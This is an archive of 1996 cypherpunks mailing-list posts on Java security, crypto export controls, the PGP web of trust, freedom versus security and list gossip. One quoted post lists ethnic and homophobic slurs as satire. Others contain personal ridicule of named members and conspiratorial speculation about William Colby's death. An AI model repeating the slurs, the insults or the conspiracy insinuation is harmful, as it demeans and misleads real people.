To: "David E. Smith" <dsmith@midwest.net>
Subject: Re: Money supply is fake anyway
In-Reply-To: <199604112204.RAA22999@cdale1.midwest.net>
Message-ID: <Pine.SV4.3.91.960430051631.26612C-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


The S&L crisis was not the result of a "run on the banks" syndrome. It 
was the result of criminal fraud and in some other cases, imprudent bank 
management. Ie, grown men who thought that, in the long run, they could 
attain non-economic rates of return on investments.

Human nature hasn't changed in 100,000 years.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 1 May 1996 07:31:19 +0800
To: cypherpunks@toad.com
Subject: Re: Calling other code in Java applications and applets
Message-ID: <199604301429.HAA08069@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


I understand that Sun is considering including a bignum package and
possibly other crypto support in native form in a future release of
Java.  There has been considerable discussion of this on the coderpunks
list.  Apparently Sun has said they will release their crypto API
within the next week or so.  However these kinds of things are often
delayed, in my experience.  An earlier version of the crypto API was
shared with Java developers at a meeting a few months ago, and the
response was quite negative, according to list memebers.  The class and
method design in many cases seemed awkward, spotty, and inconsistent.
Apparently there are also export considerations, with the NSA resisting
the inclusion of too many explicitly crypto oriented classes.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Wed, 1 May 1996 08:46:31 +0800
To: ECafe Anonymous Remailer <cpunk@remail.ecafe.org>
Subject: Re: [Joke] It Takes a Village
In-Reply-To: <199604300949.KAA05650@pangaea.hypereality.co.uk>
Message-ID: <Pine.SUN.3.91.960430072415.969A-100000@crl14.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Tue, 30 Apr 1996, ECafe Anonymous Remailer wrote:

> Here's Timothy May, the self-appointed village headman...[and
> a lot more sophomoric garbage.]
> ...
> Your village historian

But not a very good one, unfortunately.  Humor only works if it
has at least a nodding acquaintence with the truth.  This silly
screed had none. 

Once again we are treated to an attack on his betters by an 
anonymous nobody in the form of a feigned (and strained) mask of 
"witty" commentary.  What disappointments in life could have
produced such an impotent, resentful loser?


 S a n d y     	Village Apologist

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Wed, 1 May 1996 10:41:59 +0800
To: cypherpunks@toad.com
Subject: Re: [Joke] It Takes a Village
In-Reply-To: <199604300949.KAA05650@pangaea.hypereality.co.uk>
Message-ID: <Ugihx8m9LQQW085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199604300949.KAA05650@pangaea.hypereality.co.uk>,
cpunk@remail.ecafe.org (ECafe Anonymous Remailer) wrote:

> Jim Bell, village idiot.  He's always good sport for the village bully,
> Black Unicorn.  His pretentions aside ("the black unicorn has been in
> my family crest for a thousand years"), he is in actuality a short,
> portly Philadelphia accountant by the name of Irving Lipshitz-Groins.

jim bell is really a short, portly Philadelphia accountant named Irving 
Lipshitz-Groins?

- -- 
Alan Bostick               | They say in online country there is no middle way
mailto:abostick@netcom.com | You'll either be a Usenet man or a thug for the CDA
news:alt.grelb             |    Simon Spero (after Tom Glazer)
http://www.alumni.caltech.edu/~abostick

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMYYojuVevBgtmhnpAQEEiwL+NzhAqo33OFDUKWqc0eL5PlPLFTHlmGzk
ZDaUg7ReYuh1UIiTzb9/oSLxTN8r4oT9LjV1jqByb0NkiQiLS1jfLF7xzIvvwSWg
9QSNY/JLaqvzpsjDYYL74e1W10yFUoZo
=HJUe
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: angels@wavenet.com (CyberAngels Director : Colin Gabriel Hatcher)
Date: Wed, 1 May 1996 08:54:17 +0800
To: Mike McNally <m5@vail.tivoli.com>
Subject: Re: Freedom and security
Message-ID: <v01510100a9e5fbebce39@[198.147.118.199]>
MIME-Version: 1.0
Content-Type: text/plain


Mike McNally wrote

>If.... (freedom and security) ....weren't antithetical, there'd be no need
>for a balance.

If they were antithetical then as freedom increased security would
decrease, and as security increased freedom would decrease.

It is not IMHO inevitable that if we increase security we will jeopardize
freedom.  My concern is that if we ignore security we will have no freedom
left to protect.

I don't believe the Internet community is split into two camps on this
issue - there appear to me to be many places where people draw their lines
at different points.  I don't believe that security is the enemy of
freedom.  I believe that freedom needs security in order to exist at all.


*********************************************************
Colin Gabriel Hatcher - CyberAngels Director
angels@wavenet.com

"Two people may disagree, but
that does not mean that one of them is evil"

*********************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 1 May 1996 05:24:15 +0800
To: cypherpunks@toad.com
Subject: (fwd) E-Commerce Info. Needed
Message-ID: <v03006617adabbad31be3@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Reply directly to this person, and not me, please...

Cheers,
Bob Hettinga

--- begin forwarded text


From: aiq005@teix.uib.es
Date: Tue, 30 Apr 1996 09:46:56 +0200
To: RAH@shipwright.com
Subject: E-Commerce Info. Needed
Status: U

Dear sir,

I'm doing a project on Security and E-Commerce. I would like to know if you
could help me on my search of information on two subjects:

* Graphics and statistics about the growth of the e-commerce in the last
years, and also on the attacks to comercial sites on this period.

* Future tendencies, projects... on e-commerce, and how security is going
to affect the future on the commercial sites.

When I say 'information' I'm talking about URL's (of course)

Thanks a lot, and please forgive my bad use of English!

Joan Andreu (Universitat de les Illes Balears)
aiq005@teix.uib.es

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdt@zilker.net (Steve Tonnesen)
Date: Wed, 1 May 1996 06:50:36 +0800
To: cypherpunks@toad.com
Subject: Austin, TX meeting notice
Message-ID: <199604301359.IAA14894@oak.zilker.net>
MIME-Version: 1.0
Content-Type: text/plain


There will be a physical meeting of cypherpunks in Austin, TX.

   Location:  Central Market Cafe
              4001 N. Lamar Blvd.

   Time:      Saturday, May 4 at 6:00PM

This will be a general meeting covering the existing
projects (the video, the web page rebuild, and remailer
planning), events in the news, and assorted other topics.

As usual, look for a table with a stack of crypto-related books.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 1 May 1996 09:57:52 +0800
To: Ed Carp <dlv@bwalk.dm.com>
Subject: Re: Former CIA Director and *Strategic Investment* Editor
Message-ID: <m0uEI2K-00092BC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:59 AM 4/30/96 +0100, Ed Carp wrote:
>On Mon, 29 Apr 1996, Dr. Dimitri Vulis wrote:
>
>> jim bell <jimbell@pacifier.com> writes:
>> > At 04:06 AM 4/29/96 -0700, anonymous-remailer@shell.portal.com wrote:
>> > >CNN is reporting that Colby's canoe has been found on the Potomac and
>> > >Colby is missing.
>> >
>> > Don't tell me, let me guess:  The guy who rented the canoe to him has
>> > suddenly retired, and has been reportedly seen going on a Park Avenue
>> > shopping spree.  Right?
>> 
>> Jim, I don't find dumb jokes about dead people I liked particularly funny.
>
>CNN is reporting that although the search is continuing, the authorities 
>are presuming Colby drowned in a boating accident.

I'd like to hear more about the timeline.  From a snippet I heard yesterday, 
he telephoned his wife and said he'd be renting a canoe.  Okay, who and why 
did "they" visit a cabin (?) to find him? (If somebody called me from a 
cabin, and he had a telephone, I would not consider his failure to later 
answer the phone to be particularly suspicious...)  

 And one version I heard said that the canoe was at the cabin.  How often do 
fatal canoe accidents occur what might have been a few feet from shore?  
(You can't sink a modern canoe, especially a rental, because they have 
floats under the seats to prevent this.)   We can't tell, because the 
information being released is so sparse.

Somebody's not telling us the whole story.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Wed, 1 May 1996 07:22:26 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Netscape 3 betas
Message-ID: <199604301453.JAA06960@homeport.org>
MIME-Version: 1.0
Content-Type: text


I'd like to commend Jeff and Phil, and any other members of the
netscape team who are here, for the strong list of security controls
available in Atlas (beta 2)

They include control of caching SSL protected docs, alerts before
showing a cookie or submitting a form via email, control over email
address as ftp password, and, best of all, Java and JavaScript come
turned off by default.

Nice work!

(I'll also offer a pet peeve, which is I can't refuse to accept server
pushes, and the stop button doesn't really seem to affect them.  I
should be able to prevent keep-alive if I don't want it.)

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mmiller@netcom.com (Mark S. Miller)
Date: Wed, 1 May 1996 12:05:59 +0800
To: frantz@netcom.com
Subject: Re: [LONG] Churchill Club: 20th Anniversary PK Crypto
In-Reply-To: <199604300808.BAA17923@netcom9.netcom.com>
Message-ID: <199604301701.KAA14257@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


   Paul Raines, Project Manager, United States Postal Service described
   ...  The post office brings four things that private
   industry can't: ... (2) ... well established reputation, ...
   (4) it can act as a trusted third party.

Oh.  Well that's good to know.

	--MarkM

--------------------------------------------------------------------
After all, the Internet was built to help defend the free world from
attack by governments.
--------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Wed, 1 May 1996 08:04:44 +0800
To: "Benjamin T. Moore" <btmoore@iquest.net>
Subject: Re: Smartcards are coming to the US
In-Reply-To: <m0uDzVt-0048voC@iquest.net>
Message-ID: <Pine.SUN.3.91.960430100509.16499H-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 29 Apr 1996, Benjamin T. Moore wrote:

> Hummm... Did you ever wonder *why* this was introduced to the "third-world"
> countries first? If you've been following the progress of the so called "smart-

Lack of entrenched competitors? E.g. credit cards?

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 1 May 1996 06:56:49 +0800
To: Dave Del Torto <ddt@lsd.com>
Subject: Re: LolitaWatch v1.1
Message-ID: <2.2.32.19960430141123.0071edcc@popserver.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 08:02 PM 4/17/96 -0700, Dave Del Torto wrote:
>[ Newt Gingrich and his ilk being the mensches they are, I expect v2.0 may  ]
>[ add support for the "Jew," "Nigger," "Kike," "Fag," "Nerd" and "Wop" bits ]
>[  -dave                                                                    ]
>

Slick Willie and his ilk being the copraphagic cretins they are, I expect
v2.0 may
add support for the "religion", African-American, "Person of the Jewish Faith",
"Lesbian", "Gay man", "Itellectually enhanced but socially challenged", and
"Euro-American" bits.

DCF



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMYYXfIVO4r4sgSPhAQGLlQP/dB4ElSyHbDEqdOMNGESh6UNrzTcvbsZH
BKvXiPBAz2HUitD5lX3AdJ0KqJmZkPo+nRKe48rE19H370M9hFuvkOT04Jsydf6E
IOt3EyOw2McZw66rRjN0HxWiS4yHu1Bj+bhjASX7QpZoG1XKO2wozUb/AHhH1dvA
UroHHC6bJFc=
=uHho
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Wed, 1 May 1996 09:10:19 +0800
To: cypherpunks@toad.com
Subject: Re: Calling other code in Java applications and applets
In-Reply-To: <3185E5B6.3EE8@netscape.com>
Message-ID: <199604301512.KAA05052@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


>   Our Navigator 3.0 release will allow java and javascript to call into
> plugins.  Since plugins are native code, you will be able to freely mix
> C and Java.  Of course you will have to get the user to install your
> plugin on their disk.  

That's the problem, installing the plugin.

I (and some others, I think) was hoping that it would be possible to build
powerful crypto applets and put them up on web pages.  That way everyone 
with a java enabled copy of Netscape could use a remailer or send crypted 
mail without having to download, install, and configure software.

If people have to download and install a plugin to use a java mixmaster
applet, why not just download and install a native mixmaster client?

Of course there are other reasons to use java -- platform independence,
for example.  But it's the user's ability to download and run applets just
by jumping to a web page that has everyone excited.  With that gone (for 
crypto), java loses a lot of its lustre (again, for crypto work).







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@infonex.com (Lance Cottrell)
Date: Wed, 1 May 1996 13:33:27 +0800
To: unicorn@schloss.li (Black Unicorn)
Subject: Re: connecting Uni to the Web O Trust
Message-ID: <adabfc74000210044343@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Look at the signators and judge for your self. When I look at the people I
trust through one level of introducer, I find I have a very high degree of
confidence in their identities. Two introducers out, it still looks fairly
good. I have not looked farther than that. It is the limit of my trust.

In many ways it is easier to establish the authenticity of a pseudonym than
a verinym. The only question with a pseudonym is whether the nym who posts
is the same nym who posted last time, and the time before that. If, over
the course of a year or two, there are no attempts to spoof the pseudonym,
then the key will have become well connected with the nym. That is all that
matters. Even if a "Sameer" has posted for years, I still have to worry if
the person's real name is Sameer (given the current understanding of the
meaning of a signature on a key).

I once refused to sign a key because I thought the driver's license was
forged, but I would be likely to accept a better forgery at authentic. I am
at least as confident of the identity of Uni as I am of many of the other
keys I have signed. The only ones I have more confidence in are those of
long time close friends, and family.

        -Lance Cottrell

At 10:21 PM 4/28/96, sameer@c2.org wrote:
>> (Sigh).  I'll say it yet a third time.  Get a current copy of my key which
>> is signed by at least three people on the web of trust.
>
>        As if this "web of trust" was actually worth something.
>
>--
>Sameer Parekh                                   Voice:   510-601-9777x3
>Community ConneXion, Inc.                       FAX:     510-601-9734
>The Internet Privacy Provider                   Dialin:  510-658-6376
>http://www.c2.net/ (or login as "guest")                sameer@c2.net

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMYZOkPPzr81BVjMVAQGwOggA1xZguRBMxrjZisk/3Imf4VKLzTr7wNaO
J5141lamYinHEnmvNZ9VTkq7kdkoTKw572RkC+tAeMI5PjAEOhxtbnRBMumVh7u6
wnxx1BD0Onka5r4M4avr8VFsPc2CYOicG5Yk33FJKuGT9JlSKgCOOeD8U5XQlbCD
8KGr6RPyYmEkKhEA3uhAE+vUjBN5ihCYglU+9U1wlRHX6bsS2gD3xjN2jaLCRcpv
vlPPGLrxQbxi7jVKOjXM6flTpYmjnV5gDLtEKMtpF08LsvL+t51NleDGCBmV7aBp
5xIpFvFb/PRyZpZa21yESrZ13Dx+0qOgXpXEFB3A3SPGWKFQGILm0A==
=sGly
-----END PGP SIGNATURE-----

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 1 May 1996 11:25:51 +0800
To: cypherpunks@toad.com
Subject: "Scruffies" vs. "Neats"
Message-ID: <adab8d3e04021004d25b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



PREFACE

I haven't written many essays lately...something about having several
hundred or more of them on this list over the past three and a half years
makes writing another one less urgent for me.

But I've been thinking a lot about the interesting discussion we are having
over the Java security issues and basic security model for running applets,
and note some similarities with similar approaches in AI (artificial
intelligence).

I think it important that people here not "firmly commit" to positions they
may have to change, as this leads to a "sticking coefficient" that retards
changes (note that I am not commenting on which positions may need to
change!).

No one language is the end-all and be-all of programming, nor is any one
approach the inevitable winner. But it certainly behooves us to think about
likely future (and current) computing platforms. (We've done this many
times, as with discussions a few years ago about which environments to put
effort into...we had advocates of Emacs, Eudora, Perl, TCL, Safe-TCL, the
clipboard of Mac and Windows systems, pure text only, and so on. In fact,
an extensive poll was taken--by Eric Hughes, I believe--in November 1992,
with the conclusion that at least a dozen major choices were popular, with
none having a share over 10%.)

So, it is a mistake to assume that I am making a "primate display" of
supporting Java. At this point, and with having seen many fads come and go,
my strong hunch is that "Web plus browsers plus applets plus Java" is
likely to become the main choice of many people. (I am hardly alone in this
judgment, natch. Any look at the trade press, the stock market, the shelves
of new books, etc., will confirm this. But just because something is
popular does not mean it is not in fact the likely future.)

And I am sure that even the critics of various aspects of this
model--including the studies of Java security--see this same scenario
unfolding. I view their criticisms as being necessary and helpful, though I
tend to dismiss the conclusions of some that the model is so deeply flawed
that it should be discarded completely and a new model and/or language
should be awaited....this just ain't gonna happen anytime soon. (The thrust
of this essay is not how and why new computing paradigms spread, so I won't
get into my views on this. Suffice it to say that historically the world
has gotten a major new model (paradigm) no more than twice a decade, and
usually only once per decade. Left as an exercise is what those have been.)


SCRUFFIES AND NEATS

On to "scruffies" and "neats."

The AI world had two main camps, according to a popular view. The
"scruffies" and the "neats."

The scruffies believed intelligent behavior in a program would likely only
come from gobs and gobs of code. They believed in cobbling together apps as
quickly as possibly, racing out into the new landscape of computing and
rigging something up to work. Loosely speaking, they favored hacking Lisp
until something worked...a checkers program (a la ur-hacker Greenblatt), a
vision system, a robot, etc. Scruffies like messy desks, because they like
to be blasted with lots of random inputs, lots of unrelated ideas and
concepts, and "inspiration."

More recently, the scruffies have embraced neural nets, emergent
computation, stochastic computing, genetic algorithms, and similar
buzzwords. The recent work on "subsumption architectures" (a la Brooks) and
agent architectures is consistent with viewpoint (though elements of logic
are of course involved).

(These are all gross overgeneralizations, caricatures, to clearly show what
the polar viewpoints are.)

The neats, on the other hand, believed that logic rules. Epitomized by
Newell and Simon, and by the early Winograd, they believed intelligent
behavior would come when the logical principles of thought could be found
and implemented in a programming language. Much of the work on theorem
proving and logic programming came out of this camp.

According to the caricature (and caricatures can be useful, even if
overstated), the neats have neat desks, work in neat languages, and favor
mathematical rigor.

(Of course, not all neats are neat. Some are scruffy, as Ted Kaczynski shows!)


SCRUFFIES AND NEATS IN SECURITY

The "security neat" believes in applying rigor to security. Machines and
languages should be "provably secure." (Better yet, machines should be
"provably correct," a la Viper, and operating systems and languages should
produce provably correct code.)

The "security scruffy" believes things are moving too quickly to insist his
machine must be Orange Book top-rated, or that his OS must be fully
secure....in fact, he doubts that such definitions have real meaning.

[Aside: This polar caricature overstates things, as I said earlier. For
example, even the "security scruffies" are not in favor of bad
cryptographic code, of seriously-flawed PGP implementations, or of Java
applets that can reach into user files and read or corrupt them. And even
the security neats use machines hooked up to networks rather than running
programs in some secure kernel on a machine locked in a secure room....]

The scruffies believe that it may ultimately produce more overall security
(not to mention producing interesting other results!) to race out into the
new terrain, to establish outposts and colonies....

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cpunk@remail.ecafe.org (ECafe Anonymous Remailer)
Date: Wed, 1 May 1996 00:01:12 +0800
To: cypherpunks@toad.com
Subject: [Joke] It Takes a Village
Message-ID: <199604300949.KAA05650@pangaea.hypereality.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Friend,

Here's Timothy May, the self-appointed village headman.
He's surrounded by a bunch of arse-kissing accolytes:
-"Gosh, I thought that Java was garbage, but now that Tim mentions it,
it's the best thing in the world"
-"Tim's right, Java is terrific."

Village Jester: "Tim's dead wrong.  Java isn't good--it's great!" 

Then there's Perry Metzger, the local squire, who's embittered over the
fact that, while he's got some worthwhile things to say, he's always
overpowered by the "charisma" and new clothes of May.

Jim Bell, village idiot.  He's always good sport for the village bully,
Black Unicorn.  His pretentions aside ("the black unicorn has been in
my family crest for a thousand years"), he is in actuality a short,
portly Philadelphia accountant by the name of Irving Lipshitz-Groins.

Cordially,

Your village historian






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 1 May 1996 10:56:22 +0800
To: cypherpunks@toad.com
Subject: "Scruffies" vs. "Neats"
Message-ID: <adab97e00502100451c2@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



(The version I apparently just sent out was not quite complete. I saved it
in my mail program, intending to work on it later today, but it got queued
for sending inadvertently. Sorry it got sent. But maybe it's just as well,
as I can look at the commentary--if any--and make additions and
clarifications later.)

--Tim

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 1 May 1996 11:05:28 +0800
To: "Benjamin T. Moore" <btmoore@iquest.net>
Subject: Re: Smartcards are coming to the US
In-Reply-To: <m0uDzVt-0048voC@iquest.net>
Message-ID: <Pine.SOL.3.91.960430105230.3273A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


Much as we Englishmen like to pretend, it is a bit of a reach to describe 
France as a third-world country...


---
They say in  online country             So which side are you on boys
There is no middle way                  Which side are you on
You'll either be a Usenet man           Which side are you on boys
Or a thug for the CDA                   Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 1 May 1996 11:45:52 +0800
To: Mike McNally <angels@wavenet.com>
Subject: Re: Freedom and security
Message-ID: <m0uEJnz-000930C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:47 AM 4/29/96 -0500, Mike McNally wrote:
>CyberAngels Director : Colin Gabriel Hatcher wrote:
>> My position is to seek a balance between the freedom of the individual and
>> the security of the community.  My argument is that when the security of
>> the community is threatened by the freedom of the individual, the community
>> will always prioritise its safety.  Good government of course means
>> maintaining individual freedoms *and* maintaining community security.  I
>> actually disagree that they are antithetical.  On the contrary they are a
>> balance that any society has to find. 
>
>If they weren't antithetical, there'd be no need for a balance. 

Game, set, and match McNally!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Wed, 1 May 1996 11:32:13 +0800
To: "CyberAngels Director : Colin Gabriel Hatcher" <angels@wavenet.com>
Subject: Re: Freedom and security
In-Reply-To: <v01510100a9e5fbebce39@[198.147.118.199]>
Message-ID: <3186400F.43CA@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


CyberAngels Director : Colin Gabriel Hatcher wrote:
> 
> Mike McNally wrote
> 
> >If.... (freedom and security) ....weren't antithetical, there'd be no need
> >for a balance.
> 
> If they were antithetical then as freedom increased security would
> decrease, and as security increased freedom would decrease.

Ok then, if they're *not* antithetical, why do we need a balance?  Why
not just go ahead and maximize both?

> It is not IMHO inevitable that if we increase security we will jeopardize
> freedom.  My concern is that if we ignore security we will have no freedom
> left to protect.

What exactly do you consider "security" and "freedom" to mean here?  Whose
security?  Whose freedom?

I can take responsibility for ensuring that any Internet communications I
make are protected from inspection or interception by using technological
solutions.  I call that "security".  If you're interested in "security",
what are you doing to protect my freedom to use encryption and anonymous
remailer technologies?


______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * pain is inevitable  
       m5@tivoli.com * m101@io.com          *
      <URL:http://www.io.com/~m101>         * suffering is optional




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 1 May 1996 12:27:38 +0800
To: cypherpunks@toad.com
Subject: ITARs and the Export of Classes and Methods
Message-ID: <adaba38d060210041091@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:12 PM 4/30/96, Alex Strasheim wrote:
>>   Our Navigator 3.0 release will allow java and javascript to call into
>> plugins.  Since plugins are native code, you will be able to freely mix
>> C and Java.  Of course you will have to get the user to install your
>> plugin on their disk.
>
>That's the problem, installing the plugin.
>
>I (and some others, I think) was hoping that it would be possible to build
>powerful crypto applets and put them up on web pages.  That way everyone
>with a java enabled copy of Netscape could use a remailer or send crypted
>mail without having to download, install, and configure software.
>
>If people have to download and install a plugin to use a java mixmaster
>applet, why not just download and install a native mixmaster client?
>
>Of course there are other reasons to use java -- platform independence,
>for example.  But it's the user's ability to download and run applets just
>by jumping to a web page that has everyone excited.  With that gone (for
>crypto), java loses a lot of its lustre (again, for crypto work).

Hmmmhhh....

It may be--from the comments of Dan W. about the NSA, export, and Java, and
from other signs--that the NSA and its allies see the same opportunities
many of us see. And that they don't like what they see.

I hope Marianne and the other Sun and/or Netscape folks can keep us
informed on what, if anything, the NSA is telling them they can do with
Java and what they cannot do. Under the guise of "export," of course, as
there is no legal basis for restricting domestic (within the Greater Unites
States and Canada Coprosperity Sphere) crypto.

An interesting situation for the ITARs, if they try to restrict bignum
classes, for example. A class-based system, if done correctly (in whatever
language, e.g., C++ or Java), should have _most_ of the hard crypto work
already implemented in classes and methods (for bignums, modular
exponentiation, etc.), with the final crypto program much more easily
implemented and exported.

(I presume that PGP 3.0 is being done largely this way (class libraries),
and, speculatively, PGP 4.0 might be Java-based, and rely on small applets
calling the various classes.)

Does the battle for restricting exports of programs, a la PGP or Lotus
Notes, then shift to controlling the export of computer languages?!

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Tue, 30 Apr 1996 23:46:05 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: connecting Uni to the Web O Trust
In-Reply-To: <Pine.SUN.3.93.960429161730.5790A-100000@polaris.mindport.net>
Message-ID: <199604301019.MAA24346@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 The entity calling itself 
 "Black Unicorn" <unicorn@schloss.li> probably wrote:
> On Mon, 29 Apr 1996 bryce@digicash.com wrote:
> > 
> > In the meantime, I cannot have much confidence in the
> > security of my private communications with Black Unicorn,
> > which makes me hesitant to exchange money with him.
> 
> That's ok, I prefer cash.


It _was_ going to be cash!  :-)


Bryce

P.S.  For the record, I'm just talking about my offer to
settle cypherpunk bets.  This is all hypothetical.  I'm not
actually exchanging any money with Uni.  I've never met him.
Whatever he's doing, I'm not involved.  You can't prove
anything.




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMYXpJkjbHy8sKZitAQGyZAMAs4O9+WN1WBtt3hXPgiE6BEiuuQmj/u6u
RMqG3WRlhG3kMfCHZ1ypfV2SCCHYxmbBTa+olVp2yIJ5Qan13Qvr4KwI+o1JN/KO
JLG9ShEF9Uk5sduAuYUK526QJYhhce4d
=SYeA
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 1 May 1996 10:36:15 +0800
To: angels@wavenet.com (CyberAngels Director : Colin Gabriel Hatcher)
Subject: Re: Freedom and security
In-Reply-To: <v01510100a9e5fbebce39@[198.147.118.199]>
Message-ID: <199604301630.MAA14089@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



CyberAngels Director : Colin Gabriel Hatcher writes:
> If they were antithetical then as freedom increased security would
> decrease, and as security increased freedom would decrease.
> 
> It is not IMHO inevitable that if we increase security we will jeopardize
> freedom.  My concern is that if we ignore security we will have no freedom
> left to protect.
> 
> I don't believe the Internet community is split into two camps on this
> issue - there appear to me to be many places where people draw their lines
> at different points.  I don't believe that security is the enemy of
> freedom.  I believe that freedom needs security in order to exist at all.

You will pardon my asking this, but, security from what? Who are the
evil Network Terrorists throwing Bit Bombs or whatever? The only
security you need on the internet is keeping your site from being
broken in to, which is mostly a matter of setting it up
